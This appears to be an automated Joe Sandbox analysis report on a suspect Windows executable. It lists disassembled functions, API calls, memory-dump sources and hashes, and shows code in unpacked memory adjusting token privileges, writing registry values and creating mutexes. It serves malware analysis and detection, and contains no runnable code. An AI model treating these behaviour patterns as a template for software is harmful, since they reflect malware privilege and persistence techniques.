Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 004025BE
Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 004025DE
Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 004025FE
Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040261E

SetWindowRgn.USER32(?,0040C340,00000001), ref: 00409DBF
SetCapture.USER32(?), ref: 00409DC9
6CEFCE30.MFC42(00000000), ref: 00409DD0
6CF37850.MFC42(?,?,?,?,?,?,?,00000000), ref: 00409DE9

Memory Dump Source

Source File: 00000000.00000002.1624171238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1624162321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624181548.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624190626.000000000040E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624209463.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624218839.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nOZ2Oqnzbz.jbxd

Similarity

API ID: Rect$Copy$_ftol$Window$CaptureF37850
String ID:
API String ID: 3059804316-0
Opcode ID: 4a7094b539b862f338539457f0d8793b4a741916dd4dc3ebb93e6d5d52ff0bfe
Instruction ID: 353ad75620bb99855249955aa37f7dffc4285601670c8d5eecd51fb0f0ccdc6c
Opcode Fuzzy Hash: 4a7094b539b862f338539457f0d8793b4a741916dd4dc3ebb93e6d5d52ff0bfe
Instruction Fuzzy Hash: 1F416DB12187068FC304DF7AC98595BBBE8FBC8704F044A3EB49993381DB74E9098B56

Uniqueness

Uniqueness Score: -1.00%

Function 00404670 Relevance: 13.6, APIs: 9, Instructions: 144COMMON

Download Yara Rule

APIs

6CF37160.MFC42(00000000,00000001,?), ref: 004046A0
6CEF2DD0.MFC42(?), ref: 00404734
_ftol.MSVCRT ref: 00404797
_ftol.MSVCRT ref: 004047C6
6CF381F0.MFC42(?), ref: 004047E6
Polyline.GDI32(?,?,?), ref: 004047F7
6CF381F0.MFC42(00000000), ref: 00404800
6CEF2C70.MFC42(00000000), ref: 0040480E
6CF37850.MFC42 ref: 0040482A

Memory Dump Source

Source File: 00000000.00000002.1624171238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1624162321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624181548.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624190626.000000000040E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624209463.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624218839.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nOZ2Oqnzbz.jbxd

Similarity

API ID: F381_ftol$F37160F37850Polyline
String ID:
API String ID: 2981364783-0
Opcode ID: 65c356e9e78dd02551586dc06fe35886212c27d2ac6a9610dbfe3a7d5aa395d8
Instruction ID: 67acb76490eedac4ac0366a0d9b5dcd37d884ec233737b967b4c57c730f1dca4
Opcode Fuzzy Hash: 65c356e9e78dd02551586dc06fe35886212c27d2ac6a9610dbfe3a7d5aa395d8
Instruction Fuzzy Hash: 1E518DB1A08702ABC301DF15C580A5AB7F5FF88714F118A1DF895A3395EB31E829CBD6

Uniqueness

Uniqueness Score: -1.00%

Function 0040A940 Relevance: 13.6, APIs: 9, Instructions: 126COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0040A97F
_ftol.MSVCRT ref: 0040A9D4
6CF39B80.MFC42(?,?,00000000,?,00000001), ref: 0040AA03
GetWindowRect.USER32(?,?), ref: 0040AA11
6CEFE6C0.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,0040B670,000000FF), ref: 0040AA1A
SetWindowRgn.USER32(?,0040C340,00000001), ref: 0040AA45
ClientToScreen.USER32(?,?), ref: 0040AA5D
6CF023F0.MFC42(00000000,?,?,00000000,00000000,00000005), ref: 0040AA7E
6CF37850.MFC42(?,?,00000000,?,?,00000000,00000000,00000005), ref: 0040AAA5

Memory Dump Source

Source File: 00000000.00000002.1624171238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1624162321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624181548.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624190626.000000000040E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624209463.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624218839.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nOZ2Oqnzbz.jbxd

Similarity

API ID: Window$Rect$ClientF023F37850Screen_ftol
String ID:
API String ID: 706562457-0
Opcode ID: b998918826c77febf2a25c4be3886caa5153053d104f383c60fb6be50d5108d4
Instruction ID: a66530a9fee688cda4384b7b61b220c0551d436bf9aef3ce9762855fe69dfb7b
Opcode Fuzzy Hash: b998918826c77febf2a25c4be3886caa5153053d104f383c60fb6be50d5108d4
Instruction Fuzzy Hash: 58413C752047059FC714DF25C98492BB7E9FBC8B04F004A2EF98693790DB38E909CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00403C20 Relevance: 12.2, APIs: 8, Instructions: 153COMMON

Download Yara Rule

APIs

6CEF2DD0.MFC42(?), ref: 00403CFF
_ftol.MSVCRT ref: 00403D58
_ftol.MSVCRT ref: 00403D82
CreatePolygonRgn.GDI32(00000000,?,?), ref: 00403D9D
6CF376C0.MFC42(00000000), ref: 00403DA8
PtInRegion.GDI32(?,?,?,00000000), ref: 00403DC0
6CEF2C70.MFC42(00000000,00000000), ref: 00403DD3
6CF37850.MFC42 ref: 00403DEF

Memory Dump Source

Source File: 00000000.00000002.1624171238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1624162321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624181548.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624190626.000000000040E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624209463.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624218839.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nOZ2Oqnzbz.jbxd

Similarity

API ID: _ftol$CreateF376F37850PolygonRegion
String ID:
API String ID: 3457974096-0
Opcode ID: 17b7e62d37637a2d73482e15072a4be556ec02c4b51384e8a89ed16f1ffde3de
Instruction ID: bbc22f1e7c48a6dab8c73f5009b7f3ca445a8864c2917b6fdd274eb9f33cd00a
Opcode Fuzzy Hash: 17b7e62d37637a2d73482e15072a4be556ec02c4b51384e8a89ed16f1ffde3de
Instruction Fuzzy Hash: FF5113B5A087029FC300DF25C58491ABBF4FF88750F118A6EF895A2391EB35D925CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0040A090 Relevance: 7.6, APIs: 5, Instructions: 75COMMON

Download Yara Rule

APIs

73A24D40.GDI32(?,?,00000001,?,?,00000000,?,00000001,00CC0020), ref: 0040A0F7
6CF38160.MFC42(?,?,?,?,?,?,?,?,?,?,0040B56B,000000FF), ref: 0040A10A
6CF38160.MFC42(?,?,?,?,?,?,?,?,?,?,0040B56B,000000FF), ref: 0040A119
6CF37850.MFC42(?,?,?,?,?,?,?,?,0040B56B,000000FF), ref: 0040A13A
6CF01660.MFC42(?,?,?,?,?,?,?,?,0040B56B,000000FF), ref: 0040A14F

Memory Dump Source

Source File: 00000000.00000002.1624171238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1624162321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624181548.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624190626.000000000040E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624209463.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624218839.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nOZ2Oqnzbz.jbxd

Similarity

API ID: F38160$F01660F37850
String ID:
API String ID: 526543990-0
Opcode ID: 036a40311f4159b16b61297708d4b3e6f18bf612af67d3e89011d4f15b4a3778
Instruction ID: 18dcffc14f19134e82b589f7aa1d445acb49fadbf1b57fedb0062a3dc7b3293e
Opcode Fuzzy Hash: 036a40311f4159b16b61297708d4b3e6f18bf612af67d3e89011d4f15b4a3778
Instruction Fuzzy Hash: F4214F75200741DFC724DF59C984A27F7E8EB88B10F108A2EE5A697781D778E8058BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040A810 Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 00409C60: 6CF30310.MFC42(00000064,00000000), ref: 00409C67

ReleaseCapture.USER32 ref: 0040A841
GetWindowRect.USER32(?,?), ref: 0040A850
6CF309F0.MFC42 ref: 0040A8AA
6CEFFEB0.MFC42 ref: 0040A8E9
6CF303E0.MFC42 ref: 0040A8FD

Memory Dump Source

Source File: 00000000.00000002.1624171238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1624162321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624181548.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624190626.000000000040E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624209463.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624218839.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nOZ2Oqnzbz.jbxd

Similarity

API ID: CaptureF303F30310F309RectReleaseWindow
String ID:
API String ID: 3990807431-0
Opcode ID: 6e4fc3edfd80a79553657441def683f192502d6496bb5d27d1bf8310f2073b0a
Instruction ID: 631f892069c71037f24c0449ce0317af8abbe6bb1c63e0507df2ec47cffd6435
Opcode Fuzzy Hash: 6e4fc3edfd80a79553657441def683f192502d6496bb5d27d1bf8310f2073b0a
Instruction Fuzzy Hash: 2921F9B6904741CFC224EF29C441A6AB7E4FB88714F108E2FE09693B91CB789406DF57

Uniqueness

Uniqueness Score: -1.00%

Function 0040AAC0 Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 0040AACF

Part of subcall function 00404EC0: CopyRect.USER32(?,004384C8), ref: 00404ED6

6CEF50F0.MFC42(00007F8B), ref: 0040AAF4
6CEFF390.MFC42(00000086,0000000C,00000086,00007F8B), ref: 0040AB05
LoadCursorA.USER32(00000000,00007F00), ref: 0040AB29
SetCursor.USER32(00000000), ref: 0040AB30

Memory Dump Source

Source File: 00000000.00000002.1624171238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1624162321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624181548.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624190626.000000000040E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624209463.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624218839.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nOZ2Oqnzbz.jbxd

Similarity

API ID: CursorRect$ClientCopyF390Load
String ID:
API String ID: 1342657587-0
Opcode ID: 8401a0d3b9610f6867fc9abfd7e5f3a5b13e2096a23212c21d3ded89cf437529
Instruction ID: a14a2b21b2a6be2e79b6b6eccd3370489a499e26bf242809d1e0371c1f30db29
Opcode Fuzzy Hash: 8401a0d3b9610f6867fc9abfd7e5f3a5b13e2096a23212c21d3ded89cf437529
Instruction Fuzzy Hash: 5CF08C71948301EBE210A7A48C46E7772A9F708705F00063FB386B50D1D9B8B411879F

Uniqueness

Uniqueness Score: -1.00%

Function 0040A7A0 Relevance: 7.5, APIs: 5, Instructions: 33COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?), ref: 0040A7AF
6CEFE6C0.MFC42(?), ref: 0040A7BC

Part of subcall function 00404EC0: CopyRect.USER32(?,004384C8), ref: 00404ED6

SetCapture.USER32(?,?), ref: 0040A7E8
6CEFCE30.MFC42(00000000), ref: 0040A7EF
6CEFFEB0.MFC42(00000000), ref: 0040A7F6

Memory Dump Source

Source File: 00000000.00000002.1624171238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1624162321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624181548.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624190626.000000000040E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624209463.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624218839.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nOZ2Oqnzbz.jbxd

Similarity

API ID: Rect$CaptureCopyWindow
String ID:
API String ID: 1880163643-0
Opcode ID: eebbbd06ba35c8f5644d263c1b2b432bf9dbc5c997de85ab1361be0e6822f123
Instruction ID: ae120400b2eecb044a03360b6c29ead0659f610c9d08a9c692d6112fa6188a77
Opcode Fuzzy Hash: eebbbd06ba35c8f5644d263c1b2b432bf9dbc5c997de85ab1361be0e6822f123
Instruction Fuzzy Hash: F1F03CB55107059FC314EB25C4958ABB7E9FB88304B008E2EF4C653341EA34E904CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040A1B0 Relevance: 6.0, APIs: 4, Instructions: 30windowCOMMON

Download Yara Rule

APIs

6CF30310.MFC42(00000066,0040B588,?,00000000,?,0040B588,000000FF,00405856,00000000), ref: 0040A1D4
6CEF50F0.MFC42(00000066,0040B588,?,00000000,?,0040B588), ref: 0040A1E7
6CEFF390.MFC42(00000080,0000000E,00000080,00000066,0040B588,?,00000000,?,0040B588), ref: 0040A1F8
LoadIconA.USER32(00000000,00000080), ref: 0040A1FE

Memory Dump Source

Source File: 00000000.00000002.1624171238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1624162321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624181548.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624190626.000000000040E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624209463.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624218839.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nOZ2Oqnzbz.jbxd

Similarity

API ID: F30310F390IconLoad
String ID:
API String ID: 2277313538-0
Opcode ID: fc3814bc266c29e8a464827beffdbcda4908966a597202a9ea25da8d9df3f7a9
Instruction ID: 010850fd7a8354b729b1543937e653244a36a0c6ea06adee83ac2cb2bc03d40c
Opcode Fuzzy Hash: fc3814bc266c29e8a464827beffdbcda4908966a597202a9ea25da8d9df3f7a9
Instruction Fuzzy Hash: 5BF054B1644751EBE320DF59C902B07B6D4FB44B10F004A2EF591B77D0C7BD94048B99

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: nOZ2Oqnzbz.exePID: 6500, Parent PID: 7116COMMON

Execution Graph

Execution Coverage:	13%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	9.5%
Total number of Nodes:	63
Total number of Limit Nodes:	3

Executed Functions

Function 00AAA893 Relevance: 1.6, APIs: 1, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 00AAA913

Memory Dump Source

Source File: 00000003.00000002.1698945741.0000000000AAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_aaa000_nOZ2Oqnzbz.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: ca3e9a609827b3e2e43cd2871e6d7ba79cee9fcb248c73f7a73bc4e11c756233
Instruction ID: 6081f1c1909c16b72867c7ea70860d87b26d9589b8b12cee3989b1fa71559ad5
Opcode Fuzzy Hash: ca3e9a609827b3e2e43cd2871e6d7ba79cee9fcb248c73f7a73bc4e11c756233
Instruction Fuzzy Hash: F121D1765097809FEB228F25DC40B52BFF4EF17310F0984DAE9858B5A3D375A908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00AAAA15 Relevance: 1.6, APIs: 1, Instructions: 57nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL ref: 00AAAA81

Memory Dump Source

Source File: 00000003.00000002.1698945741.0000000000AAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_aaa000_nOZ2Oqnzbz.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 7e8f9f64220407db2ec7c247f314b060a821e53f57415823e6bd0be0ffff1a2c
Instruction ID: b02bc3af4ebd2468ce5051e9439ce7633c2ddab0ea3f95e8c5cbf8bce37a94e3
Opcode Fuzzy Hash: 7e8f9f64220407db2ec7c247f314b060a821e53f57415823e6bd0be0ffff1a2c
Instruction Fuzzy Hash: D411D0714093C09FDB228F10DC44A52FFF4EF17314F0984CAE9848B263D275A908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00AAA8CA Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 00AAA913

Memory Dump Source

Source File: 00000003.00000002.1698945741.0000000000AAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_aaa000_nOZ2Oqnzbz.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 88636a6e010899557eed66780a29b4f3f1fb78926fa4a8a9cb5dc46c9931f83b
Instruction ID: 2753920525a2c80d43f685d86053dcfc4e648e79a59c0aca62f2f1e48aa04ac1
Opcode Fuzzy Hash: 88636a6e010899557eed66780a29b4f3f1fb78926fa4a8a9cb5dc46c9931f83b
Instruction Fuzzy Hash: E211C2726003009FEB20CF55D844B66FBE4EF19320F08C46ADD4A8B652D335E418DF62

Uniqueness

Uniqueness Score: -1.00%

Function 00AAAA46 Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL ref: 00AAAA81

Memory Dump Source

Source File: 00000003.00000002.1698945741.0000000000AAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_aaa000_nOZ2Oqnzbz.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 014e26fed7254b54e1554f065120d919e69508456733eac5689aa977cfbf4a13
Instruction ID: d21fb9c74ea22b67135ab3eecd53cdd4d418954994ee995a3dede97b7c626ead
Opcode Fuzzy Hash: 014e26fed7254b54e1554f065120d919e69508456733eac5689aa977cfbf4a13
Instruction Fuzzy Hash: 4701A235500240DFDB208F45DA44B62FBF0EF19360F08C4AADD4A4B652D375E418DFA2

Uniqueness

Uniqueness Score: -1.00%

Function 00E60CD8 Relevance: .7, Instructions: 749COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1699642472.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e60000_nOZ2Oqnzbz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 094780a3432d6be59976ab7a436565820814a7a707ae82fa0b9a39ecd12513ce
Instruction ID: 600bfa199517e035e72c8284ee9f0f174128d88d189976b7fcb23ac3fcc63682
Opcode Fuzzy Hash: 094780a3432d6be59976ab7a436565820814a7a707ae82fa0b9a39ecd12513ce
Instruction Fuzzy Hash: F3721474E40269CFCB24DF68D984BADB7B2FB48308F2485A9D409AB755DB34AD81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00AAAE23 Relevance: 1.6, APIs: 1, Instructions: 98
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00AAAED9

Memory Dump Source

Source File: 00000003.00000002.1698945741.0000000000AAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_aaa000_nOZ2Oqnzbz.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 81757d6a87a097075710284575175afc69930e10cc9f1a1762e84706cc4a5c56
Instruction ID: aa498e9ee67c73d467c5f4fb76a8fcee8d95edb64418ee5bf2159d23dd0f8d26
Opcode Fuzzy Hash: 81757d6a87a097075710284575175afc69930e10cc9f1a1762e84706cc4a5c56
Instruction Fuzzy Hash: 9A31D0B1505380AFE722CF61CC44B62BFF8EF16314F08849AE9858B692D375E909CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00AAAB92 Relevance: 1.6, APIs: 1, Instructions: 89
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE(?,?), ref: 00AAAC39

Memory Dump Source

Source File: 00000003.00000002.1698945741.0000000000AAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_aaa000_nOZ2Oqnzbz.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 2cfe73a671241b1e2f2d55a4fe3d6f2621146f2109257815f3fd75409a014648
Instruction ID: 3cfb0cd1489c8a70fdd0a4fdb51164274aad12d918d214fb569fc25191f3b9c5
Opcode Fuzzy Hash: 2cfe73a671241b1e2f2d55a4fe3d6f2621146f2109257815f3fd75409a014648
Instruction Fuzzy Hash: E9319EB15093846FE711CF65CC45BA6BFF8EF16214F08849AE984CB293D375E909C762

Uniqueness

Uniqueness Score: -1.00%

Function 00AAA361 Relevance: 1.6, APIs: 1, Instructions: 85
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(?,00000E24,B3732319,00000000,00000000,00000000,00000000), ref: 00AAA40C

Memory Dump Source

Source File: 00000003.00000002.1698945741.0000000000AAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_aaa000_nOZ2Oqnzbz.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: e2305b26f19227e63708f248b660d672b9a230fe6c8d5c841d38a56a5366f254
Instruction ID: 757df09e6e9cf7ae49a40a82df5b59d48d9740c2a31c410566f46fbd6506203f
Opcode Fuzzy Hash: e2305b26f19227e63708f248b660d672b9a230fe6c8d5c841d38a56a5366f254
Instruction Fuzzy Hash: 0F317175509784AFE722CF11CC85F92BBF8EF16710F08849AE945CB692D364E909CB72

Uniqueness

Uniqueness Score: -1.00%

Function 00AAAF30 Relevance: 1.6, APIs: 1, Instructions: 79
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNELBASE(?,00000E24,B3732319,00000000,00000000,00000000,00000000), ref: 00AAAFC5

Memory Dump Source

Source File: 00000003.00000002.1698945741.0000000000AAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_aaa000_nOZ2Oqnzbz.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 6cc96162e2226ac84967fc85f4fa119231cb3c47587e5211d6654bdbaeb1162f
Instruction ID: ca674b3fbf250358af649eeb3150938c61f1513b21257022c29c042bf05062c6
Opcode Fuzzy Hash: 6cc96162e2226ac84967fc85f4fa119231cb3c47587e5211d6654bdbaeb1162f
Instruction Fuzzy Hash: 0D213AB54097806FE7128B15DC81BA6BFBCEF17324F0980D6E9818B293D364AD09C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 00AAA462 Relevance: 1.6, APIs: 1, Instructions: 77
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegSetValueExW.KERNELBASE(?,00000E24,B3732319,00000000,00000000,00000000,00000000), ref: 00AAA4F8

Memory Dump Source

Source File: 00000003.00000002.1698945741.0000000000AAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_aaa000_nOZ2Oqnzbz.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 80a152eec468f159cbb2f7845ffbfa0ae37955181713b19ab4e099dbde271fe5
Instruction ID: f766393234ef551af2b1e48353d789e2436ca315b3ca754e148061c9d2882806
Opcode Fuzzy Hash: 80a152eec468f159cbb2f7845ffbfa0ae37955181713b19ab4e099dbde271fe5
Instruction Fuzzy Hash: F52192765083846FD7228F51DC45F67BFF8EF56210F08849AE945CB692D364E808C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 00AAAE5A Relevance: 1.6, APIs: 1, Instructions: 76
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00AAAED9

Memory Dump Source

Source File: 00000003.00000002.1698945741.0000000000AAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_aaa000_nOZ2Oqnzbz.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 4108a7a4bc74f1ab587a1174437567e0711c3ca439906bfe164013767cc57d5f
Instruction ID: 4bffaeb8ebb9cef914bbd99bf36ecafe4a3418dc171cc474c1b06e2b3aadd31d
Opcode Fuzzy Hash: 4108a7a4bc74f1ab587a1174437567e0711c3ca439906bfe164013767cc57d5f
Instruction Fuzzy Hash: C621B271604204AFE720DF65DD45B66FBE8EF19310F04846AE9458BA92D375E808CB72

Uniqueness

Uniqueness Score: -1.00%

Function 00AAA67B Relevance: 1.6, APIs: 1, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 00AAA6F6

Memory Dump Source

Source File: 00000003.00000002.1698945741.0000000000AAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_aaa000_nOZ2Oqnzbz.jbxd

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 579a22e6adacee2e431ef801d339d279ed5b347233bc338a50117731324dd8a0
Instruction ID: ea9d2bf505abedc53d5dc376fa18dea9470eaf5cf8738b4d312a90cbdcada93c
Opcode Fuzzy Hash: 579a22e6adacee2e431ef801d339d279ed5b347233bc338a50117731324dd8a0
Instruction Fuzzy Hash: DB2180755093805FD7128B65DC85B92BFF8AF17310F0984DAE885CB2A3D324E909CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00AAABC6 Relevance: 1.6, APIs: 1, Instructions: 72
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE(?,?), ref: 00AAAC39

Memory Dump Source

Source File: 00000003.00000002.1698945741.0000000000AAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_aaa000_nOZ2Oqnzbz.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: a246f9e1b7fa793bffa4cfd90bf64cda1541786c2d46a38666bbd851cb7696ed
Instruction ID: 4c655d252d294cfead37e07f4d575e6a026a8858bbeb7fd872762e7b2eefa99d
Opcode Fuzzy Hash: a246f9e1b7fa793bffa4cfd90bf64cda1541786c2d46a38666bbd851cb7696ed
